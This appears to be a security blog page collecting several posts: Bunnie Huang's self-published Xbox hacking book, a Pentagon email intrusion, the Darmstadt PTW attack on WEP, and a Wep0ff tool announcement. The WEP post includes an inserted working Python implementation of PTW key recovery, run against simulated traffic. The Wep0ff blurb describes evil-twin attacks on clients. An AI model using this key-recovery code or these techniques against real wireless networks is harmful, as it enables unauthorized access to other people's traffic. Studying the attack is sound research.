Hacker-engineer Andrew “Bunnie” Huang says he’s already pre-sold
between 400 and 500 copies of his self-published tell-all “Hacking the
Xbox: an Introduction to Reverse Engineering,” weeks before its
scheduled May 27th publication date, despite — or perhaps because of
— looming suspicions by some that the book skirts the edges of
legality.
“It’s about getting the book out there on principle, because I can’t
find a publisher willing to publish it,” says Huang. “I think it’s
controversial, but not illegal.”
With chapters on “Soldering Techniques” and “Installing a Blue LED,”
Huang’s how-to may not seem an obvious candidate for joining
Huckleberry Finn and Harry Potter on history’s sad list of once-banned
books. But Microsoft, the maker of the Xbox, has taken a dim view of
home modifications of the game console, focusing its litigious ire in
particular on “mod chips” that allow Xbox owners to run software that
Microsoft hasn’t approved and licensed. With a mod chip installed,
users can run everything from virtual juke boxes to the Linux
operating system on the game platform — as well as pirated copies of
Xbox games.
Last year, a Microsoft lawsuit temporarily shut down the Hong
Kong-based company Lik Sang, which sold mod chips over the Internet.
And last month, mod chip entrepreneur David Rocci was sentenced to
five months in federal custody for conspiracy to violate the Digital
Millennium Copyright Act. Rocci was the proprietor of a U.S. website
that sold mod chips and helped users locate pirated copies of Xbox
games to run on their modified machines.
Huang says his book describes some types of mod chips: it explains how
they work, and what lessons they offer designers of secure hardware
platforms. For example, the “Matrix” chip installs solderlessly over a
test port manufacturers left on the Xbox motherboard. “You don’t leave
these test structures on the motherboard, if you want it secure,” says
Huang. Another chapter helps readers replace the machine’s firmware –
a mod chip trick used by sophisticated pirates and tinkerers. “They
can be used by the pirating community, and they can be used by the
Linux community — so that one chapter that talks about firmware
devices plays to the Linux community,” says Huang. “I believe that
should be a legal activity.”
DMCA Fears
The book also revisits a technique that cemented Huang’s reputation as
a hardware hacker last year, which involves building custom hardware
to intercept an encryption key as it crosses the Xbox’s internal
high-speed bus. To avoid legal complications, Huang published his
research paper on the technique only after receiving permission from
Microsoft, negotiated with the help of EFF attorney Lee Tien. “To get
the paper published in the first place we had to negotiate a legal
mine field,” says Tien, who went on to contribute a chapter on the
legalities of reverse engineering to Huang’s book.
But Huang didn’t get Microsoft’s blessing for Hacking the Xbox, which
goes beyond discussing a single hacking technique. The book aims to
teach readers how to think like a hardware hacker, using the internal
secrets of the game console the way a med school teacher uses Gray’s
Anatomy. With the boundaries of federal copyright law, particularly
the DMCA, unclear, Huang says tech-publishing house John Wiley & Sons
got cold feet and withdrew its plans to publish the book sometime
after Rocci’s guilty plea.
Wiley didn’t return phone calls on the matter.
Unable to find another publisher, Huang elected to sell the book
himself through the Web. He dug into his own pockets to fund a print
run of 1,000 books, which he says will be delivered to his home later
this month. “It’ll be only a matter of two weeks when a pallet of
books comes to my doorstep,” he says. “Every book will be boxed by my
own two hands.”
Huang began accepting credit cards through his website this week,
after already selling nearly half of his initial print run through a
PayPal account. He says he’s barely reached the break-even point.
“He’s not going to make a huge amount of money,” says Tien. “He thinks
that it’s worthwhile stuff. That it’s interesting, and it’s teaching
people.”
“Mainly, at this point, it’s boiled down to a political battle, for
the freedom to tinker,” says Huang. “For my entire life I’ve been
playing with hardware. This is the first time someone’s told me I
can’t play with hardware because it’s illegal.”
The Pentagon got owned pretty hard with 1,500 accounts being taken offline due to a hack attack. For once however they did admit the incident and didn’t try to cover it over or brush it off.
I guess the number of attacks they get is exponentially more than other networks…but still, I would have thought they should be super secure.
About 1,500 unclassified e-mail users at the Pentagon had their service disrupted yesterday when a hacker infiltrated the e-mail system, forcing the accounts to be taken offline.
In a briefing today with reporters in Washington at the Pentagon, Secretary of Defense Robert M. Gates confirmed the incident and said that the users were disconnected from the system after the intrusion was discovered.
“The reality is that the Defense Department is constantly under attack,” Gates said during the briefing. “Elements of the [Office of the Secretary of Defense] unclassified e-mail system were taken offline yesterday afternoon, due to a detected penetration. A variety of precautionary measures are being taken. We expect the system to be online again very soon.”
The funny thing is the Secretary of Defense himself doesn’t even use e-mail…so I doubt he even noticed what had happened.
Hopefully the government will sharpen up its ideas.
Gates said that he was not sure why the 1,500 users were removed temporarily from the system. “Well, I don’t know the answer to that, and they’re still investigating it.”
Gates said he doesn’t use e-mail, so he didn’t know if his account was affected.
“I don’t do e-mail,” he said. “I’m a very low-tech person.”
A spokesman at the Department of Defense late this afternoon said he had no additional information about the incident.
Cryptography researchers say that WEP, the encryption still found on many wireless access points, can now be cracked in under a minute.
Erik Tews, Andrei Pychkine and Ralf-Philipp Weinmann of the cryptography and computer algebra group at the Technical University of Darmstadt in Germany refined an attack on Wired Equivalent Privacy (WEP) published by Andreas Klein in 2005, so that the packets needed to recover a WEP key can be collected in around a minute.
Earlier WEP attacks typically took around 40 minutes, because they needed far more captured packets before the key used to encrypt the network could be found.
The researchers said that it was possible to recover a 104-bit WEP key with a 50 per cent probability of success using just 40,000 captured packets.
‘For 60,000 available data packets, the success probability is about 80 per cent and for 85,000 data packets about 95 per cent,’ the researchers said. ‘Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good conditions.’
They said the computation of the crack took about three seconds using 3MB of memory on a Pentium-M 1.7 GHz machine. ‘The same attack can be used for 40-bit keys too with an even higher success probability,’ they said.
The researchers implemented a proof of concept of the attack as aircrack-ptw, a tool used together with the aircrack-ng suite. In use it resembles aircrack-ng itself, which has long been used to crack WEP-protected networks.
‘We believe that WEP should not be used in sensitive environments. Most wireless equipment vendors provide support for TKIP (also known as WPA1) and CCMP (also known as WPA2) which provides a much higher security level. All users should switch to WPA1 or even better WPA2,’ the researchers said.
The researchers plan to give a talk about the new crack at the Easterhegg 2007 security conference in Hamburg this month.
A paper describing the details and methods used in the attack can be found here.
Source: PcPro
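The attack described above, as an added example that is not code from the article, from the Darmstadt group or from aircrack-ptw: a pure-Python model of WEP (RC4 keyed with IV || key), the known-plaintext keystream extraction that ARP re-injection makes possible, and the PTW-style vote on sums of key bytes computed from the RC4 state after only the three IV steps of the key schedule, followed by the key-ranking and verification step a real tool performs. The 40-bit key, the IVs and the ARP traffic are constructed inside the script (`simulate_capture` stands in for what airodump-ng records while aireplay-ng replays an ARP request); the vote formula is the Klein/PTW correlation restated from the published description, and all function names are the example's own.

```python
"""Added example (not the article's or any tool's code): a toy WEP network
and a PTW-style key recovery against it.  Everything here is constructed."""
import itertools
import random

N = 256

def ksa(key):
    """RC4 key scheduling: returns the permutation S for the given key."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S

def rc4(key, data):
    """RC4 as a stream cipher: KSA, then XOR data with the PRGA keystream."""
    S = ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % N])
    return bytes(out)

# First 16 plaintext bytes of every WEP-encapsulated ARP request: LLC/SNAP
# header, EtherType 0x0806, fixed ARP header fields, opcode 1.  This is the
# known plaintext the attack relies on (802.11 headers and ICV omitted).
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")

def wep_encrypt(key, iv, plaintext):
    """WEP: per-packet RC4 key is IV || key; the IV travels in clear."""
    return iv + rc4(iv + key, plaintext)

def wep_decrypt(key, frame):
    return rc4(frame[:3] + key, frame[3:])

def keystream_from_known_plaintext(frame, known_prefix):
    """Attacker's view of one frame: its IV and the keystream bytes exposed by
    the known plaintext (16 bytes for ARP, enough for a 104-bit key)."""
    body = frame[3:3 + len(known_prefix)]
    return frame[:3], bytes(c ^ p for c, p in zip(body, known_prefix))

def ksa_after_iv(iv):
    """Only the first three KSA steps depend on nothing but the IV.
    Returns S_3, its inverse S_3^-1 and j_3."""
    S, Sinv, j = list(range(N)), list(range(N)), 0
    for i in range(3):
        j = (j + S[i] + iv[i]) % N
        S[i], S[j] = S[j], S[i]
        Sinv[S[i]], Sinv[S[j]] = i, j
    return S, Sinv, j

def ptw_votes(packets, klen):
    """One vote per packet for each sigma_i = K[3] + ... + K[3+i] (mod 256):
    sigma_i ~ S_3^-1[(3+i) - X[2+i]] - (j_3 + sum_{k=3}^{3+i} S_3[k]),
    which holds noticeably more often than 1/256 (the Klein/PTW bias)."""
    votes = [[0] * N for _ in range(klen)]
    for iv, X in packets:
        S, Sinv, ssum = ksa_after_iv(iv)
        for i in range(klen):
            ssum = (ssum + S[3 + i]) % N
            votes[i][(Sinv[(3 + i - X[2 + i]) % N] - ssum) % N] += 1
    return votes

def ranked_candidates(votes, depth):
    """Simple key ranking: keep the `depth` best-voted values of each sigma_i."""
    return [sorted(range(N), key=lambda v: -row[v])[:depth] for row in votes]

def recover_key(frames, klen, known_prefix=ARP_REQUEST_PREFIX, depth=3):
    """Vote, convert sigma candidates to keys (K[3+i] = sigma_i - sigma_{i-1}),
    and verify each key against a captured frame.  Returns the key or None."""
    packets = [keystream_from_known_plaintext(f, known_prefix) for f in frames]
    cands = ranked_candidates(ptw_votes(packets, klen), depth)
    iv, body = frames[0][:3], frames[0][3:11]
    for sigmas in itertools.product(*cands):
        key = bytes((s - p) % N for s, p in zip(sigmas, (0,) + sigmas[:-1]))
        if rc4(iv + key, body) == known_prefix[:8]:  # 64-bit check against one frame
            return key
    return None

def simulate_capture(key, n, rng):
    """Constructed traffic: n ARP requests under random IVs, i.e. what the
    sniffer sees while a captured ARP request is re-injected over and over."""
    return [wep_encrypt(key, bytes(rng.randrange(N) for _ in range(3)), ARP_REQUEST_PREFIX)
            for _ in range(n)]

if __name__ == "__main__":
    rng = random.Random(2007)
    secret = bytes(rng.randrange(N) for _ in range(5))   # constructed 40-bit key
    frames = simulate_capture(secret, 40_000, rng)
    found = recover_key(frames, klen=5)
    print("real key     :", secret.hex())
    print("recovered key:", found.hex() if found else None)
```

Run stand-alone, the script votes over 40,000 constructed packets and usually recovers the 5-byte key; the attack is statistical, so a run that prints `None` is not a bug, it wants more packets or a larger `depth`. The 8-byte check in `recover_key` is the same idea as a tool confirming a candidate against a captured frame; note that the product of the ranked lists grows as `depth ** klen`, which is why real implementations for 13-byte keys rank candidates far more cleverly than this loop does.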
Wep0ff is a new tool that cracks a WEP key without access to the AP, by mounting a fake access point attack against WEP-based wireless clients.
It uses a combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP key recovery.
This tool can be used to mount a fake access point attack against WEP-based wireless clients.
You can download it here: